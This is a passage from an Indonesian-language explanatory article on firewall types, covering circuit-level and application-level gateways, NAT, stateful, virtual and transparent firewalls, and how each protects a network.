Firewall jenis lainnya adalah Circuit-Level Gateway, yang umumnya berupa komponen dalam sebuah proxy server. Firewall jenis ini beroperasi pada level yang lebih tinggi dalam model referensi tujuh lapis OSI (bekerja pada lapisan sesi/session layer) daripada Packet Filter Firewall. Modifikasi ini membuat firewall jenis ini berguna dalam rangka menyembunyikan informasi mengenai jaringan terproteksi, meskipun firewall ini tidak melakukan penyaringan terhadap paket-paket individual yang mengalir dalam koneksi.
Dengan menggunakan firewall jenis ini, koneksi yang terjadi antara pengguna dan jaringan pun disembunyikan dari pengguna. Pengguna akan dihadapkan secara langsung dengan firewall pada saat proses pembuatan koneksi dan firewall pun akan membentuk koneksi dengan sumber daya jaringan yang hendak diakses oleh pengguna setelah mengubah alamat IP dari paket yang ditransmisikan oleh dua belah pihak. Hal ini mengakibatkan terjadinya sebuah sirkuit virtual (virtual circuit) antara pengguna dan sumber daya jaringan yang ia akses.
Firewall ini dianggap lebih aman dibandingkan dengan Packet-Filtering Firewall, karena pengguna eksternal tidak dapat melihat alamat IP jaringan internal dalam paket-paket yang ia terima, melainkan alamat IP dari firewall. Protokol yang populer digunakan sebagai Circuit-Level Gateway adalah SOCKS v5.
Application Level Firewall


Application Level Firewall (disebut juga sebagai application proxy atau application level gateway)
Firewall jenis lainnya adalah Application Level Gateway (atau Application-Level Firewall atau sering juga disebut sebagai Proxy Firewall), yang umumnya juga merupakan komponen dari sebuah proxy server. Firewall ini tidak mengizinkan paket yang datang untuk melewati firewall secara langsung. Tetapi, aplikasi proxy yang berjalan dalam komputer yang menjalankan firewall akan meneruskan permintaan tersebut kepada layanan yang tersedia dalam jaringan privat dan kemudian meneruskan respons dari permintaan tersebut kepada komputer yang membuat permintaan pertama kali yang terletak dalam jaringan publik yang tidak aman.
Umumnya, firewall jenis ini akan melakukan autentikasi terlebih dahulu terhadap pengguna sebelum mengizinkan pengguna tersebut untuk mengakses jaringan. Selain itu, firewall ini juga mengimplementasikan mekanisme auditing dan pencatatan (logging) sebagai bagian dari kebijakan keamanan yang diterapkannya. Application Level Firewall juga umumnya mengharuskan beberapa konfigurasi yang diberlakukan pada pengguna untuk mengizinkan mesin klien agar dapat berfungsi. Sebagai contoh, jika sebuah proxy FTP dikonfigurasikan di atas sebuah application layer gateway, proxy tersebut dapat dikonfigurasikan untuk mengizinlan beberapa perintah FTP, dan menolak beberapa perintah lainnya. Jenis ini paling sering diimplementasikan pada proxy SMTP sehingga mereka dapat menerima surat elektronik dari luar (tanpa menampakkan alamat e-mail internal), lalu meneruskan e-mail tersebut kepada e-mail server dalam jaringan. Tetapi, karena adanya pemrosesan yang lebih rumit, firewall jenis ini mengharuskan komputer yang dikonfigurasikan sebagai application gateway memiliki spesifikasi yang tinggi, dan tentu saja jauh lebih lambat dibandingkan dengan packet-filter firewall.
NAT Firewall
NAT (Network Address Translation) Firewall secara otomatis menyediakan proteksi terhadap sistem yang berada di balik firewall karena NAT Firewall hanya mengizinkan koneksi yang datang dari komputer-komputer yang berada di balik firewall. Tujuan dari NAT adalah untuk melakukan multiplexing terhadap lalu lintas dari jaringan internal untuk kemudian menyampaikannya kepada jaringan yang lebih luas (MAN, WAN atau Internet) seolah-olah paket tersebut datang dari sebuah alamat IP atau beberapa alamat IP. NAT Firewall membuat tabel dalam memori yang mengandung informasi mengenai koneksi yang dilihat oleh firewall. Tabel ini akan memetakan alamat jaringan internal ke alamat eksternal. Kemampuan untuk menaruh keseluruhan jaringan di belakang sebuah alamat IP didasarkan terhadap pemetaan terhadap port-port dalam NAT firewall.
Lihat juga: Network Address Translation
Stateful Firewall


Cara kerja stateful firewall
Stateful Firewall merupakan sebuah firewall yang menggabungkan keunggulan yang ditawarkan oleh packet-filtering firewall, NAT Firewall, Circuit-Level Firewall dan Proxy Firewall dalam satu sistem. Stateful Firewall dapat melakukan filtering terhadap lalu lintas berdasarkan karakteristik paket, seperti halnya packet-filtering firewall, dan juga memiliki pengecekan terhadap sesi koneksi untuk meyakinkan bahwa sesi koneksi yang terbentuk tersebut diizinlan. Tidak seperti Proxy Firewall atau Circuit Level Firewall, Stateful Firewall umumnya didesain agar lebih transparan (seperti halnya packet-filtering firewall atau NAT firewall). Tetapi, stateful firewall juga mencakup beberapa aspek yang dimiliki oleh application level firewall, sebab ia juga melakukan inspeksi terhadap data yang datang dari lapisan aplikasi (application layer) dengan menggunakan layanan tertentu. Firewall ini hanya tersedia pada beberapa firewall kelas atas, semacam Cisco PIX. Karena menggabungkan keunggulan jenis-jenis firewall lainnya, stateful firewall menjadi lebih kompleks.
Virtual Firewall
Virtual Firewall adalah sebutan untuk beberapa firewall logis yang berada dalam sebuah perangkat fisik (komputer atau perangkat firewall lainnya). Pengaturan ini mengizinkan beberapa jaringan agar dapat diproteksi oleh sebuah firewall yang unik yang menjalankan kebijakan keamanan yang juga unik, cukup dengan menggunakan satu buah perangkat. Dengan menggunakan firewall jenis ini, sebuah ISP (Internet Service Provider) dapat menyediakan layanan firewall kepada para pelanggannya, sehingga mengamankan lalu lintas jaringan mereka, hanya dengan menggunakan satu buah perangkat. Hal ini jelas merupakan penghematan biaya yang signifikan, meski firewall jenis ini hanya tersedia pada firewall kelas atas, seperti Cisco PIX 535.
Transparent Firewall
Transparent Firewall (juga dikenal sebagai bridging firewall) bukanlah sebuah firewall yang murni, tetapi ia hanya berupa turunan dari stateful Firewall. Daripada firewall-firewall lainnya yang beroperasi pada lapisan IP ke atas, transparent firewall bekerja pada lapisan Data-Link Layer, dan kemudian ia memantau lapisan-lapisan yang ada di atasnya. Selain itu, transparent firewall juga dapat melakukan apa yang dapat dilakukan oleh packet-filtering firewall, seperti halnya stateful firewall dan tidak terlihat oleh pengguna (karena itulah, ia disebut sebagai Transparent Firewall).
I ntinya, transparent firewall bekerja sebagai sebuah bridge yang bertugas untuk menyaring lalu lintas jaringan antara dua segmen jaringan. Dengan menggunakan transparent firewall, keamanan sebuah segmen jaringan pun dapat diperkuat, tanpa harus mengaplikasikan NAT Filter. Transparent Firewall menawarkan tiga buah keuntungan, yakni sebagai berikut:
• Konfigurasi yang mudah (bahkan beberapa produk mengklaim sebagai "Zero Configuration"). Hal ini memang karena transparent firewall dihubungkan secara langsung dengan jaringan yang hendak diproteksinya, dengan memodifikasi sedikit atau tanpa memodifikasi konfigurasi firewall tersebut. Karena ia bekerja pada data-link layer, pengubahan alamat IP pun tidak dibutuhkan. Firewall juga dapat dikonfigurasikan untuk melakukan segmentasi terhadap sebuah subnet jaringan antara jaringan yang memiliki keamanan yang rendah dan keamanan yang tinggi atau dapat juga untuk melindungi sebuah host, jika memang diperlukan.
• Kinerja yang tinggi. Hal ini disebabkan oleh firewall yang berjalan dalam lapisan data-link lebih sederhana dibandingkan dengan firewall yang berjalan dalam lapisan yang lebih tinggi. Karena bekerja lebih sederhana, maka kebutuhan pemrosesan pun lebih kecil dibandingkan dengan firewall yang berjalan pada lapisan yang tinggi, dan akhirnya performa yang ditunjukannya pun lebih tinggi.
• Tidak terlihat oleh pengguna (stealth). Hal ini memang dikarenakan Transparent Firewall bekerja pada lapisan data-link, dan tidak membutuhkan alamat IP yang ditetapkan untuknya (kecuali untuk melakukan manajemen terhadapnya, jika memang jenisnya managed firewall). Karena itulah, transparent firewall tidak dapat terlihat oleh para penyerang. Karena tidak dapat diraih oleh penyerang (tidak memiliki alamat IP), penyerang pun tidak dapat menyerangnya.